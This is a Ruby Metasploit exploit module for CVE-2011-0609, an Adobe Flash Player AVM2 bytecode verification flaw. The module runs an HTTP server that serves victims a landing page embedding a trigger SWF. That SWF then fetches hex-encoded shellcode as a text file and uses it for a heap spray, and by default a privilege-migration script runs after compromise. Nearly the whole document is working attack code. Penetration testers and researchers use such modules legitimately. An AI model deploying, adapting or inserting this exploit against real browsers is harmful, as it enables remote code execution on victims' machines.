##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
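# Browser exploit module for CVE-2011-0609 (Adobe Flash Player AVM2
# verification flaw, see 'Description' below).
#
# The module is a small HTTP server (Msf::Exploit::Remote::HttpServer::HTML).
# It serves three things, all selected by URI in #on_request_uri:
#   * a landing page whose <object>/<embed> points at a randomly named .swf,
#   * the pre-built trigger SWF loaded from the framework data directory, and
#   * the hex-encoded payload, which the SWF fetches as a .txt resource.
# Each response is an ordinary, unauthenticated HTTP exchange with a fixed
# Content-Type ('text/html', 'application/x-shockwave-flash', 'text/plain'),
# gzip-compressed and chunked by default (see 'DefaultOptions').
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata (name, references, default options, payload
  # constraints, targets) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework; merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',
        'Description' => %q{
          This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33
          and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
          logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same
          vulnerability that was used for the RSA attack in March 2011.

          Specifically, this issue results in uninitialized memory being referenced and later
          executed. Taking advantage of this issue relies on heap spraying and controlling the
          uninitialized memory.

          Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several
          other browsers. DEP does catch the exploit and causes it to fail. Due to the nature
          of the uninitialized memory its fairly difficult to get around this restriction.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bannedit', # Metasploit version,
          'Unknown' # Malcode version seen used in targeted attacks
        ],
        'References' => [
          ['CVE', '2011-0609'],
          ['OSVDB', '71254'],
          ['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
          ['URL', 'http://www.adobe.com/devnet/swf.html'],
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html'],
          ['URL', 'http://www.f-secure.com/weblog/archives/00002226.html'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'HTTP::compression' => 'gzip',
          'HTTP::chunked' => true,
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Automatic', {}],
        ],
        'DisclosureDate' => '2011-03-15',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the pre-built trigger SWF into @swf, then defers to the HttpServer
  # mixin (super) to start serving requests.
  #
  # File.binread reads the whole file in binary mode and always closes the
  # handle; the previous open/read/close sequence leaked the descriptor when
  # the read raised between open and close.
  #
  # @raise [SystemCallError] if the SWF cannot be read from the data directory
  def exploit
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2011-0609.swf')
    @swf = File.binread(path)

    super
  end

  # Handles one client request. The response is chosen by URI:
  #   * anything containing ".swf" (case-insensitive) gets the trigger SWF,
  #   * anything containing ".txt" gets the hex-encoded payload, which the
  #     SWF requests itself (source: external/source/exploits/CVE-2011-0609/exploit.as),
  #   * everything else gets the landing page that embeds the SWF.
  # The .swf file name and the object id are freshly randomized per request;
  # the .swf branch matches on the extension only, so any name works.
  #
  # @param cli [Rex::Proto::Http::Client-side connection] the requesting client
  # @param request [Rex::Proto::Http::Request] the parsed request
  def on_request_uri(cli, request)
    trigger = @swf
    trigger_file = rand_text_alpha(rand(3..8)) + '.swf'
    # 'H*' gives the payload as a hex string; the SWF consumes it as text.
    shellcode = payload.encoded.unpack('H*')[0]
    obj_id = rand_text_alpha(rand(3..8))

    if request.uri =~ /\.swf/i
      print_status('Sending Exploit SWF')
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    # we use a nice trick by having Flash request our shellcode and load it for the heap spray
    # src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as
    if request.uri =~ /\.txt/i
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
      return
    end

    # allowNetworking="all" is presumably what lets the embedded SWF issue the
    # .txt request above -- confirm against the Flash embed documentation.
    html = <<~EOS
      <html>
      <head>
      </head>
      <body>
      <center>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
        id="#{obj_id}" width="600" height="400"
        codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
        <param name="movie" value="#{get_resource}#{trigger_file}" />
        <embed src="#{get_resource}#{trigger_file}" quality="high"
          width="320" height="300" name="#{obj_id}" align="middle"
          allowNetworking="all"
          type="application/x-shockwave-flash"
          pluginspage="http://www.macromedia.com/go/getflashplayer">
        </embed>

      </object>
      </center>

      </body>
      </html>
    EOS

    print_status("Sending #{self.name} HTML")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end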